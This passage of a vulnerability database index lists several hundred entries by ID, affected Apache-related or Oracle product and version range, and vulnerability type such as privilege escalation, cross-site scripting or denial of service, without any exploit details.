12685| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
12686| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
12687| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
12688| [127007] Apache Spark Request Code Execution
12689| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
12690| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
12691| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
12692| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
12693| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
12694| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
12695| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
12696| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
12697| [126346] Apache Tomcat Path privilege escalation
12698| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
12699| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
12700| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
12701| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
12702| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
12703| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
12704| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
12705| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
12706| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
12707| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
12708| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
12709| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
12710| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
12711| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
12712| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
12713| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
12714| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
12715| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
12716| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
12717| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
12718| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
12719| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
12720| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
12721| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
12722| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
12723| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
12724| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
12725| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
12726| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
12727| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
12728| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
12729| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
12730| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
12731| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
12732| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
12733| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
12734| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
12735| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
12736| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
12737| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
12738| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
12739| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
12740| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
12741| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
12742| [123197] Apache Sentry up to 2.0.0 privilege escalation
12743| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
12744| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
12745| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
12746| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
12747| [122800] Apache Spark 1.3.0 REST API weak authentication
12748| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
12749| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
12750| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
12751| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
12752| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
12753| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
12754| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
12755| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
12756| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
12757| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
12758| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
12759| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
12760| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
12761| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
12762| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
12763| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
12764| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
12765| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
12766| [121354] Apache CouchDB HTTP API Code Execution
12767| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
12768| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
12769| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
12770| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
12771| [120168] Apache CXF weak authentication
12772| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
12773| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
12774| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
12775| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
12776| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
12777| [119306] Apache MXNet Network Interface privilege escalation
12778| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
12779| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
12780| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
12781| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
12782| [118143] Apache NiFi activemq-client Library Deserialization denial of service
12783| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
12784| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
12785| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
12786| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
12787| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
12788| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
12789| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
12790| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
12791| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
12792| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
12793| [117115] Apache Tika up to 1.17 tika-server command injection
12794| [116929] Apache Fineract getReportType Parameter privilege escalation
12795| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
12796| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
12797| [116926] Apache Fineract REST Parameter privilege escalation
12798| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
12799| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
12800| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
12801| [115883] Apache Hive up to 2.3.2 privilege escalation
12802| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
12803| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
12804| [115518] Apache Ignite 2.3 Deserialization privilege escalation
12805| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
12806| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
12807| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
12808| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
12809| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
12810| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
12811| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
12812| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
12813| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
12814| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
12815| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
12816| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
12817| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
12818| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
12819| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
12820| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
12821| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
12822| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
12823| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
12824| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
12825| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
12826| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
12827| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
12828| [113895] Apache Geode up to 1.3.x Code Execution
12829| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
12830| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
12831| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
12832| [113747] Apache Tomcat Servlets privilege escalation
12833| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
12834| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
12835| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
12836| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
12837| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
12838| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
12839| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
12840| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
12841| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
12842| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
12843| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
12844| [112885] Apache Allura up to 1.8.0 File information disclosure
12845| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
12846| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
12847| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
12848| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
12849| [112625] Apache POI up to 3.16 Loop denial of service
12850| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
12851| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
12852| [112339] Apache NiFi 1.5.0 Header privilege escalation
12853| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
12854| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
12855| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
12856| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
12857| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
12858| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
12859| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
12860| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
12861| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
12862| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
12863| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
12864| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
12865| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
12866| [112114] Oracle 9.1 Apache Log4j privilege escalation
12867| [112113] Oracle 9.1 Apache Log4j privilege escalation
12868| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
12869| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
12870| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
12871| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
12872| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
12873| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
12874| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
12875| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
12876| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
12877| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
12878| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
12879| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
12880| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
12881| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
12882| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
12883| [110701] Apache Fineract Query Parameter sql injection
12884| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
12885| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
12886| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
12887| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
12888| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
12889| [110106] Apache CXF Fediz Spring cross site request forgery
12890| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
12891| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
12892| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
12893| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
12894| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
12895| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
12896| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
12897| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
12898| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
12899| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
12900| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
12901| [108938] Apple macOS up to 10.13.1 apache denial of service
12902| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
12903| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
12904| [108935] Apple macOS up to 10.13.1 apache denial of service
12905| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
12906| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
12907| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
12908| [108931] Apple macOS up to 10.13.1 apache denial of service
12909| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
12910| [108929] Apple macOS up to 10.13.1 apache denial of service
12911| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
12912| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
12913| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
12914| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
12915| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
12916| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
12917| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
12918| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
12919| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
12920| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
12921| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
12922| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
12923| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
12924| [108782] Apache Xerces2 XML Service denial of service
12925| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
12926| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
12927| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
12928| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
12929| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
12930| [108629] Apache OFBiz up to 10.04.01 privilege escalation
12931| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
12932| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
12933| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
12934| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
12935| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
12936| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
12937| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
12938| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
12939| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
12940| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
12941| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
12942| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
12943| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
12944| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
12945| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
12946| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
12947| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
12948| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
12949| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
12950| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
12951| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
12952| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
12953| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
12954| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
12955| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
12956| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
12957| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
12958| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
12959| [107639] Apache NiFi 1.4.0 XML External Entity
12960| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
12961| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
12962| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
12963| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
12964| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
12965| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
12966| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
12967| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
12968| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
12969| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
12970| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
12971| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
12972| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
12973| [107197] Apache Xerces Jelly Parser XML File XML External Entity
12974| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
12975| [107084] Apache Struts up to 2.3.19 cross site scripting
12976| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
12977| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
12978| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
12979| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
12980| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
12981| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
12982| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
12983| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
12984| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
12985| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
12986| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
12987| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
12988| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
12989| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
12990| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
12991| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
12992| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
12993| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
12994| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
12995| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
12996| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
12997| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
12998| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
12999| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
13000| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
13001| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
13002| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
13003| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
13004| [105878] Apache Struts up to 2.3.24.0 privilege escalation
13005| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
13006| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
13007| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
13008| [105643] Apache Pony Mail up to 0.8b weak authentication
13009| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
13010| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
13011| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
13012| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
13013| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
13014| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
13015| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
13016| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
13017| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
13018| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
13019| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
13020| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
13021| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
13022| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
13023| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
13024| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
13025| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
13026| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
13027| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
13028| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
